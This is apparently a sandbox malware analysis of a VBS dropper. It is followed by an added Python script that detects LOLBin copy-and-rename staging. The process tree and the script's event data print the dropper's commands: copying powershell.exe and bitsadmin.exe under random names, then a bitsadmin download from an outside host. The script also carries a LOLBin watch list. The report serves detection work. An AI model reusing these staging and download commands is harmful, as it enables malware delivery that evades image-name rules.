Analysis
max time kernel: 135s
max time network: 49s
platform: windows10_x64
resource: win10v200430
submitted: 13-07-2020 07:26
Static task: static1
Behavioral task: behavioral1
  Sample: Fatt_cliente_01557430269.vbs
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: Fatt_cliente_01557430269.vbs
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: Fatt_cliente_01557430269.vbs
Size: 4KB
MD5: 5b96f2ae8a3683b45b13cabbf3a134ee
SHA1: 57d4d4b4a328628471949a3d434b5993ce6430ba
SHA256: a0291ef7ae4a775b1ac0a6cf14f58dba8ea3703c41cacc73b64f00f46d053766
SHA512: f724493f0a1ebdc89ce901e11e30eeb98b82186ae0e748ff2dc80939d2532c6573bdf7e98366b53f568ca8d502a093331779028fe14b5088796f859a4f83e909
Score: 8/10
Malware Config
Signatures
Suspicious use of WriteProcessMemory (7 IoCs)
Processes:
  description                       pid   process      target process
  PID 2804 wrote to memory of 996   2804  WScript.exe  cmd.exe
  PID 2804 wrote to memory of 996   2804  WScript.exe  cmd.exe
  PID 2804 wrote to memory of 1700  2804  WScript.exe  cmd.exe
  PID 2804 wrote to memory of 1700  2804  WScript.exe  cmd.exe
  PID 2804 wrote to memory of 1136  2804  WScript.exe  VWga.exe
  PID 2804 wrote to memory of 1136  2804  WScript.exe  VWga.exe
  PID 2804 wrote to memory of 1136  2804  WScript.exe  VWga.exe
Executes dropped EXE (1 IoC)
Processes:
  pid   process
  1136  VWga.exe
Processes
C:\Windows\System32\WScript.exe (PID 2804)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_01557430269.vbs"
  Signatures: Suspicious use of WriteProcessMemory
    C:\Windows\System32\cmd.exe (PID 996)
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zVWga.exe
    C:\Windows\System32\cmd.exe (PID 1700)
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\VWga.exe
    C:\Users\Admin\AppData\Roaming\VWga.exe (PID 1136)
      "C:\Users\Admin\AppData\Roaming\VWga.exe" /transfer mTGVIF /download https://mzgotech.com/temha/01557430269/it.gif C:\Users\Admin\AppData\Roaming\it.gif
      Signatures: Executes dropped EXE
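The process tree shows the technique worth detecting: the VBS does not drop a payload of its own but copies two built-in Windows binaries (bitsadmin.exe and the 32-bit powershell.exe) out of SysWOW64 into the user's Roaming profile under random names, then runs the renamed bitsadmin copy to fetch a file. Any rule keyed on the image name "bitsadmin.exe" misses PID 1136, because the image is VWga.exe; only the command line (/transfer ... /download) and the earlier copy give it away. In this trace only the bitsadmin copy is launched; the powershell copy (zVWga.exe) is staged but never executed within the analysis window. The following detection logic is an added example written for this page, not output of the sandbox or code from the sample. The event records are constructed from the command lines above (the fields pid, ppid, image and cmdline, the benign control event, and the LOLBINS list are assumptions, not the sandbox's export format), and the script flags (1) a cmd copy of a LOLBin from a system directory to a non-system path, (2) later execution of a process whose image is one of those staged copies, and (3) bitsadmin download syntax from an image that is not bitsadmin.exe.

```python
"""Detect LOLBin copy-and-rename staging followed by a bitsadmin download.

Added example for the process tree above; not part of the sandbox report.
Event field names (pid, ppid, image, cmdline) and the benign control event
are assumptions made for this script.
"""
import re
from pathlib import PureWindowsPath

# Built-in binaries commonly copied under a new name to escape image-name rules
# (assumed list; extend to taste)
LOLBINS = {"bitsadmin.exe", "powershell.exe", "certutil.exe",
           "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# A genuine instance of those binaries runs from one of these directories
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed events mirroring the report's tree, plus one benign control run
EVENTS = [
    {"pid": 2804, "ppid": 1200, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_01557430269.vbs"'},
    {"pid": 996, "ppid": 2804, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zVWga.exe'},
    {"pid": 1700, "ppid": 2804, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\VWga.exe'},
    {"pid": 1136, "ppid": 2804, "image": r"C:\Users\Admin\AppData\Roaming\VWga.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\VWga.exe" /transfer mTGVIF /download https://mzgotech.com/temha/01557430269/it.gif C:\Users\Admin\AppData\Roaming\it.gif'},
    # Benign control (constructed): the real bitsadmin run from System32
    {"pid": 4100, "ppid": 4000, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r'bitsadmin /transfer job1 /download https://example.invalid/a.txt C:\Temp\a.txt'},
]

# cmd's copy: "copy [/flags...] <src> <dst>", operands optionally quoted
COPY_RE = re.compile(r'\bcopy\b\s+(?:/\S+\s+)*("[^"]*"|\S+)\s+("[^"]*"|\S+)',
                     re.IGNORECASE)

# bitsadmin download syntax: /transfer <job> ... /download <url> <localfile>
BITS_RE = re.compile(r'/transfer\b.*?/download\b', re.IGNORECASE | re.DOTALL)


def lolbin_copy(cmdline):
    """Return (src, dst) when cmdline copies a LOLBin from a system directory
    to a path outside the system directories; otherwise None."""
    m = COPY_RE.search(cmdline)
    if not m:
        return None
    src, dst = (s.strip('"') for s in m.groups())
    src_l, dst_l = src.lower(), dst.lower()
    if PureWindowsPath(src_l).name not in LOLBINS:
        return None
    if src_l.startswith(SYSTEM_DIRS) and not dst_l.startswith(SYSTEM_DIRS):
        return src, dst
    return None


def renamed_bitsadmin(event):
    """True when a process uses bitsadmin's /transfer /download syntax
    but its image name is not bitsadmin.exe."""
    image = PureWindowsPath(event["image"].lower()).name
    return image != "bitsadmin.exe" and BITS_RE.search(event["cmdline"]) is not None


def analyze(events):
    """Walk events in order and return (rule, pid, detail) findings.
    Staged copies are remembered so that later execution of the copy is
    correlated back to the binary it was cloned from."""
    findings = []
    staged = {}  # lower-cased destination path -> source LOLBin path
    for ev in events:
        pair = lolbin_copy(ev["cmdline"])
        if pair:
            src, dst = pair
            staged[dst.lower()] = src
            findings.append(("lolbin_copy", ev["pid"], f"{src} -> {dst}"))
        image_l = ev["image"].lower()
        if image_l in staged:
            findings.append(("renamed_lolbin_exec", ev["pid"],
                             f"{ev['image']} is a copy of {staged[image_l]}"))
        if renamed_bitsadmin(ev):
            findings.append(("renamed_bitsadmin_download", ev["pid"], ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyze(EVENTS):
        print(f"{rule:28} pid={pid:<5} {detail}")
```

Run against the constructed events, the script reports the two copies (PIDs 996 and 1700), the execution of the renamed bitsadmin copy (PID 1136) and its download command line, and stays silent on the control run from System32. Command-line matching is deliberately the weakest layer here; in an EDR the same staging is caught more robustly by hashing new executables in user-writable paths against the system's own binaries, or by comparing the PE OriginalFilename with the on-disk name.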